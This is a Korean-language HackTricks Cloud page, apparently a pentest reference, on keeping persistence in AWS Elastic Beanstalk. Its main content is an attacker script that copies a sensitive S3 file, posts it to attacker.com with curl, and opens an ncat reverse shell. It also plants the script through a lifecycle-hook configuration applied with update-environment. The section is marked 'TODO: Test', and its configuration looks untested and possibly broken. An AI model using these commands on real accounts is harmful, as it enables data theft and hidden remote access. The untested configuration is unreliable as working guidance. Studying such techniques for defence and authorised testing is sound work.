Korean - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - Elastic Beanstalk Persistence

Support HackTricks

Elastic Beanstalk

์ž์„ธํ•œ ์ •๋ณด๋Š” ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”:

์ธ์Šคํ„ด์Šค ๋‚ด ์ง€์†์„ฑ

AWS ๊ณ„์ • ๋‚ด์—์„œ ์ง€์†์„ฑ์„ ์œ ์ง€ํ•˜๊ธฐ ์œ„ํ•ด, ์ธ์Šคํ„ด์Šค ๋‚ด์— ์ง€์†์„ฑ ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ๋„์ž…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค (cron job, ssh key...) ๊ทธ๋ž˜์„œ ๊ณต๊ฒฉ์ž๋Š” ์ด๋ฅผ ํ†ตํ•ด ์ ‘๊ทผํ•˜๊ณ  IAM ์—ญํ•  ์ž๊ฒฉ ์ฆ๋ช…์„ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์„œ๋น„์Šค์—์„œ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ฒ„์ „ ๋‚ด ๋ฐฑ๋„์–ด

๊ณต๊ฒฉ์ž๋Š” S3 ๋ฆฌํฌ์ง€ํ† ๋ฆฌ ๋‚ด์˜ ์ฝ”๋“œ๋ฅผ ๋ฐฑ๋„์–ดํ•˜์—ฌ ํ•ญ์ƒ ์ž์‹ ์˜ ๋ฐฑ๋„์–ด์™€ ์˜ˆ์ƒ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ƒˆ๋กœ์šด ๋ฐฑ๋„์–ด ๋ฒ„์ „

๊ณต๊ฒฉ์ž๋Š” ์‹ค์ œ ๋ฒ„์ „์˜ ์ฝ”๋“œ๋ฅผ ๋ณ€๊ฒฝํ•˜๋Š” ๋Œ€์‹ , ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ƒˆ๋กœ์šด ๋ฐฑ๋„์–ด ๋ฒ„์ „์„ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์‚ฌ์šฉ์ž ์ •์˜ ๋ฆฌ์†Œ์Šค ๋ผ์ดํ”„์‚ฌ์ดํด ํ›… ์•…์šฉ

TODO: Test

Elastic Beanstalk๋Š” ์ธ์Šคํ„ด์Šค ํ”„๋กœ๋น„์ €๋‹ ๋ฐ ์ข…๋ฃŒ ์ค‘์— ์‚ฌ์šฉ์ž ์ •์˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ผ์ดํ”„์‚ฌ์ดํด ํ›…์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ฃผ๊ธฐ์ ์œผ๋กœ ๋ฐ์ดํ„ฐ๋ฅผ ์œ ์ถœํ•˜๊ฑฐ๋‚˜ AWS ๊ณ„์ •์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ์œ ์ง€ํ•˜๋Š” ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก ๋ผ์ดํ”„์‚ฌ์ดํด ํ›…์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
HackTricks ์ง€์›ํ•˜๊ธฐ
PreviousAWS - ECS PersistenceNextAWS - EFS Persistence

Last updated